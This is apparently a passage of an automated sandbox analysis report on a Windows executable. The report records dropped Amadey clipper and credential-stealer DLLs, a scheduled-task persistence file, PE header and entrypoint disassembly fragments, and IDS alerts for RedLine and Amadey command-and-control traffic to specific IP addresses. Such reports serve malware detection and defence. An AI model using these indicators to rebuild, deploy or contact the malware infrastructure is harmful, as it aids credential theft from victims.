Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................................7[.........................................B............c...........Rich............................PE..d.....].........." .........."...............................................B.....f.@...`.........................................@I8.....X.9.\|.....B.......?.P.....?.H.....B. t..p. .T............................. .................X............................text...$........................... ..`.rdata..............................@..@.data........09......"9.............@....pdata..P.....?......2=.............@..@.rsrc.........B......8?.............@..@.reloc.. t....B..v...D?.............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI71402\select.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26696
Entropy (8bit):	6.101296746249305
Encrypted:	false
SSDEEP:	768:6kYtqIDCNdwhBfAqXuqzz5H1IGqGbWDG4y4:6TnDCNCh93X7zzR1IGqG2y4
MD5:	6AE54D103866AAD6F58E119D27552131
SHA1:	BC53A92A7667FD922CE29E98DFCF5F08F798A3D2
SHA-256:	63B81AF5D3576473C17AC929BEA0ADD5BF8D7EA95C946CAF66CBB9AD3F233A88
SHA-512:	FF23F3196A10892EA22B28AE929330C8B08AB64909937609B7AF7BFB1623CD2F02A041FD9FAB24E4BC1754276BDAFD02D832C2F642C8ECDCB233F639BDF66DD0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................)............................M................M......M......M.E....M......Rich...........PE..d.....].........." .........2......h...............................................a"....`..........................................?..L....@..x....p.......`.......N..H.......,....2..T............................3...............0...............................text...u........................... ..`.rdata.......0......."..............@..@.data........P.......:..............@....pdata.......`.......<..............@..@.rsrc........p.......@..............@..@.reloc..,............L..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI71402\ucrtbase.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1046080
Entropy (8bit):	6.649151787942547
Encrypted:	false
SSDEEP:	24576:L1foGwlaDT22+Pk+j2ZXCE6cctEMmxvSZX0ypCD3:JfoBR2+PfXWrT
MD5:	4E326FEEB3EBF1E3EB21EEB224345727
SHA1:	F156A272DBC6695CC170B6091EF8CD41DB7BA040
SHA-256:	3C60056371F82E4744185B6F2FA0C69042B1E78804685944132974DD13F3B6D9
SHA-512:	BE9420A85C82EEEE685E18913A7FF152FCEAD72A90DDCC2BCC8AB53A4A1743AE98F49354023C0A32B3A1D919BDA64B5D455F6C3A49D4842BBBA4AA37C1D05D67
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........of...5...5...5..5...5...5&..5...5...5...4...5...4...5...4...5...4...5...4..5...5...5...4...5Rich...5........PE..d....]..........." .....:...........a..............................................4m....`A................................................................. ..........@J..............p........................... f..............................................text... 9.......:.................. ..`.rdata..N....P.......>..............@..@.data....&..........................@....pdata....... ......................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI71402\unicodedata.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1096264
Entropy (8bit):	5.343512979675051
Encrypted:	false
SSDEEP:	12288:EGe9qQOZ67191SnFRFotduNFBjCmN/XlyCAx9++bBlhJk93cgewrxEeBc0bB:EGe9GK4oYhCc/+9nbDhG2wrxc0bB
MD5:	4C0D43F1A31E76255CB592BB616683E7
SHA1:	0A9F3D77A6E064BAEBACACC780701117F09169AD
SHA-256:	0F84E9F0D0BF44D10527A9816FCAB495E3D797B09E7BBD1E6BD666CEB4B6C1A8
SHA-512:	B8176A180A441FE402E86F055AA5503356E7F49E984D70AB1060DEE4F5F17FCEC9C01F75BBFF75CE5F4EF212677A6525804BE53646CC0D7817B6ED5FD83FD778
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.0v..^%..^%..^%.f.%..^%Tv_$..^%Tv[$..^%TvZ$..^%Tv]$..^%.w_$..^%cx_$..^%.._%N.^%.wS$..^%.w^$..^%.w.%..^%.w\$..^%Rich..^%................PE..d.....].........." .....L...V.......*..............................................-.....`.........................................p...X..............................H........... )..T............................)...............`..p............................text...1J.......L.................. ..`.rdata..>-...`.......P..............@..@.data................~..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1yeapmqy.wnw.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fpkvyt4g.vgc.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_incjf0ub.zxx.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k05ekhr5.dpv.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_no0l5gjm.vsz.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oijma5ci.grm.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vlq2cymm.fzf.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wqzyfxmy.fme.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	441344
Entropy (8bit):	6.488128856014368
Encrypted:	false
SSDEEP:	12288:JOKJim5EI9tVEw/JF4+D3q2IMbgiDK7mWasB:Jj9tL8ZMEiDfWb
MD5:	4962575A2378D5C72E7A836EA766E2AD
SHA1:	549964178B12017622D3CBDDA6DBFDEF0904E7E2
SHA-256:	EFF5FAD47B9C739B09E760813B2BCBB0788EB35598F72E64FF95C794E72E6676
SHA-512:	911A59F7A6785DD09A57DCD6D977B8ABD5E160BD613786E871A1E92377C9E6F3B85FE3037431754BBDB1212E153776EFCA5FADAC1DE6B2AD474253DA176E8E53
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........BS..,...,...,.../...,...).#.,..(...,../...,..)...,.......,...(...,...-...,...-.j.,.U.%...,.U.....,.U.....,.Rich..,.........PE..L.....Zg..........................................@..........................0............@..................................F...................................E......8...........................8...@...............<............................text...z........................... ..`.rdata...I.......J..................@..@.data....m...`...,...H..............@....rsrc................t..............@..@.reloc...E.......F...v..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe

Download File

Process:	C:\Users\user\Desktop\yINR7uQlPr.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	308224
Entropy (8bit):	6.27479026130529
Encrypted:	false
SSDEEP:	6144:Y2J31coxDzgqSAy3/wLZRYa2dWSS8ySQIaTgHJ0tYRV4OeJiqbQ5rF4:71coxDzgxAKILIa2d1S8ySQIaTpjKrF4
MD5:	DD1E3F38AE7711D270748012AF613950
SHA1:	B3B90EEC3507F523AA63802CC16E5248C8EF0EA8
SHA-256:	2997292293C332E73B11FA28126B6FBEFEA75A6BB02001EB017DE46797D4E4EC
SHA-512:	0EFF0CBA972B6622FB59683FE4D15D1B6C1EF106166189F60DCD7B4C76B6CEB82FD5C71433DC61394F03EFF03575F2BE27DEC6AC8AB064491710263879B11BCA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a\.i%=.:%=.:%=.:,EJ:&=.:%=.:&=.:JKr:-=.:JKC:$=.:JKD:$=.:Rich%=.:................PE..d...<zZg.........."......:...*......\4.........@..........................................@.................................................@h..(.......(.......@....................................................................P.. ............................text....9.......:.................. ..`.rdata.......P.......>..............@..@.data........p......................@....pdata..@............X..............@..@.rsrc...(............\..............@..@.x64.....`.......T...`..................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\yINR7uQlPr.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.36076412023942
Encrypted:	false
SSDEEP:	3072:Vdu5ZXB8ZuzQT7SgmME8Yn/YoZ3SNqpidU1epf:WjGymSg7E8Y3Z3AdUwpf
MD5:	C2F3FBBBE6D5F48A71B6B168B1485866
SHA1:	1CD56CFC2DC07880B65BD8A1F5B7147633F5D553
SHA-256:	C7ED512058BC924045144DAA16701DA10F244AC12A5EA2DE901E59DCE6470839
SHA-512:	E211F18C2850987529336E0D20AA894533C1F6A8AE6745E320FD394A9481D3A956C719AC29627AFD783E36E5429C0325B98E60AEE2A830E75323C276C72F845A
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........P...................................................................@......@......@.~.....@......Rich............................PE..L.....Zg...........!.....D..........bp.......`...............................0............@.....................................P.......................................8...............................@............`..L............................text....C.......D.................. ..`.rdata..*u...`...v...H..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1281024
Entropy (8bit):	6.466046469058072
Encrypted:	false
SSDEEP:	24576:BO//kL3TtMhQsnoXyajMK8fCZEqcAxQBuLv8YPKpTG:z3pMhQzRM3MfcAxHv8t
MD5:	C6AABB27450F1A9939A417E86BF53217
SHA1:	B8EF3BB7575139FD6997379415D7119E452B5FC4
SHA-256:	B91A3743C7399AEE454491862E015EF6FC668A25D1AA2816E065A86A03F6BE35
SHA-512:	E5FE205CB0F419E0A320488D6FA4A70E5ED58F25B570B41412EBD4F32BBE504FF75ACB20BFEA22513102630CF653A41E5090051F20AF2ED3AADB53CE16A05944
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........D........................s.................................................X..........Rich...........................PE..d.....Zg.........." .........8...............................................P............`..........................................~..X....~....... .......`...............0..l.......p...........................p...8............................................text............................... ..`.rdata..............................@..@.data............D..................@....pdata.......`......................@..@_RDATA...............t..............@..@.rsrc........ .......v..............@..@.reloc..l....0.......x..............@..B........................................................................................................................................................................................

C:\Windows\Tasks\Gxtuum.job

Download File

Process:	C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe
File Type:	data
Category:	dropped
Size (bytes):	290
Entropy (8bit):	3.4289930081624274
Encrypted:	false
SSDEEP:	6:mw3xX55ZsUEZ+lX1VsLlw3btFXqYEp5t/uy0lZtsEt0:9uQ1VsLlw37fXVZtNt0
MD5:	DBEBCB5F6362A94E964E71D1779A609A
SHA1:	7C2DB8E81E6868B16B5491F36BE6983DA660111D
SHA-256:	30F8501B22BF6B27817C6B2E36C374DB9A0E76404BD3A01EA9DB242F6EDF66E2
SHA-512:	58C600AA6985391520145E8CA41959C120E959A8F6E13E05F9656B8B4499B365DD165B6E5C5E93DBE97CA8CB3C2114566483B049BC73778DEE6845BD31DA0C41
Malicious:	false
Preview:	.....$.T~]M..^..)..F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.e.e.2.9.e.a.5.0.8.b.\.G.x.t.u.u.m...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0...................@3P.........................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	6.283898970170584
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	yINR7uQlPr.exe
File size:	307'712 bytes
MD5:	1bbc3bff13812c25d47cd84bca3da2dc
SHA1:	d3406bf8d0e9ac246c272fa284a35a3560bdbff5
SHA256:	0a17e2ca8f223de67c0864fac1d24c7bb2d0c796c46e9ce04e4dff374c577ea1
SHA512:	181b1e2bd08978b6ee3da2b48e0b113623b85c42ab8cec2a23bd5119aba7105fdeef9b7b00343d37b0c8344494640ce0a51615393def8242334420134f75871f
SSDEEP:	6144:O2JKCwoXjMvjfTK/zNTdEpZ4m1qpxXQKQrUJ0tYRVAOTIdTsImm:8CwoXjMbTKLNhEpZ4m0vXQKQrxgu
TLSH:	7B644B27308162CFF798B273D01499B4D4FEE8B552B64AA5A120F6F7171B2C34F14EA6
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a\.i%=.:%=.:%=.:,EJ:&=.:%=.:&=.:JKr:-=.:JKC:$=.:JKD:$=.:Rich%=.:................PE..d....SXg.........."......:...*......\4.....

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x14000345c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x675853D5 [Tue Dec 10 14:44:37 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	f48301e47b2e40bf9641ab1156532a80

Entrypoint Preview

Instruction
dec eax
sub esp, 00000278h
call 00007F6A9D014A7Dh
call 00007F6A9D016BF4h
movzx eax, al
test eax, eax
je 00007F6A9D016E4Ah
xor ecx, ecx
call dword ptr [00003F0Ch]
call 00007F6A9D017C28h
mov dword ptr [esp+30h], 00000104h
mov edx, dword ptr [esp+30h]
dec eax
lea ecx, dword ptr [esp+40h]
call 00007F6A9D017692h
dec eax
lea edx, dword ptr [00002FF2h]
dec eax
lea ecx, dword ptr [esp+40h]
call 00007F6A9D0178B1h
test eax, eax
je 00007F6A9D016E91h
dec eax
mov ecx, dword ptr [00003B85h]
call 00007F6A9D017D31h
movzx eax, al
test eax, eax
jne 00007F6A9D016E55h
dec eax
lea ecx, dword ptr [00002FE2h]
call 00007F6A9D017D1Eh
movzx eax, al
test eax, eax
je 00007F6A9D016E4Ah
xor ecx, ecx
call dword ptr [00003CE6h]
call 00007F6A9D016C52h
xor eax, eax
cmp eax, 01h
je 00007F6A9D016E4Fh
mov ecx, 0000C350h
call dword ptr [00003C7Fh]
jmp 00007F6A9D016E2Eh
xor ecx, ecx
call dword ptr [00003CC5h]
dec eax
lea edx, dword ptr [00002FB6h]
dec eax
lea ecx, dword ptr [esp+40h]
call 00007F6A9D01784Dh
test eax, eax
je 00007F6A9D016E7Eh
dec eax
lea ecx, dword ptr [00002FB9h]
call 00007F6A9D017CCDh
movzx eax, al
test eax, eax
je 00007F6A9D016E4Ah

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729
[C++] VS2010 build 30319
[RES] VS2010 build 30319
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6840	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x9000	0x328	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x8000	0x240	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x5000	0x20	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x39cb	0x3a00	a8859d1f9b0c91e6fb1eb31e0fba6d60	False	0.4165544181034483	zlib compressed data	5.545864849703848	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x5000	0x18c8	0x1a00	54f0fa7b25bcbaa76c26039919fc716b	False	0.29041466346153844	OpenPGP Public Key	4.185103722160237	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x7000	0x688	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x8000	0x240	0x400	c0d1e6294ad4138cca9188a27b6b84e5	False	0.345703125	data	2.5822176110941975	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x9000	0x328	0x400	0d7214eb073287b0cc1ef48e92bf4fcb	False	0.361328125	data	2.6200573070054105	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.x64	0xa000	0x46000	0x45200	5d9520d19d3dfa4f5a275bd011d96ad0	False	0.46218071880650996	data	6.108634375053754	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x9060	0x2c4	data	English	United States	0.4717514124293785

Imports

DLL	Import
KERNEL32.dll	LoadLibraryA, GetVersionExW, GetProcAddress

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-13T01:37:06.461578+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.5	49707	185.81.68.147	80	TCP
2024-12-13T01:37:17.775120+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.5	49711	185.81.68.147	80	TCP
2024-12-13T01:37:22.874431+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.5	49726	185.81.68.147	80	TCP
2024-12-13T01:37:26.656312+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:26.656312+0100	2046045	ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)	1	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:27.096738+0100	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	1	185.81.68.147	1912	192.168.2.5	49738	TCP
2024-12-13T01:37:30.835138+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.5	49752	185.81.68.148	80	TCP
2024-12-13T01:37:30.873651+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49753	185.81.68.147	80	TCP
2024-12-13T01:37:32.149745+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:33.161554+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:33.281672+0100	2046056	ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)	1	185.81.68.147	1912	192.168.2.5	49738	TCP
2024-12-13T01:37:33.618848+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:33.820737+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.5	49761	185.81.68.148	80	TCP
2024-12-13T01:37:34.850542+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:35.288592+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:35.765758+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:36.069997+0100	2855239	ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST)	1	192.168.2.5	49769	185.81.68.147	80	TCP
2024-12-13T01:37:36.156479+0100	2855239	ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST)	1	192.168.2.5	49770	185.81.68.147	80	TCP
2024-12-13T01:37:36.213761+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:36.421957+0100	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	192.168.2.5	49775	185.81.68.147	80	TCP
2024-12-13T01:37:36.578919+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49772	185.81.68.147	80	TCP
2024-12-13T01:37:36.859262+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:37.364802+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49738	185.81.68.147	1912	TCP
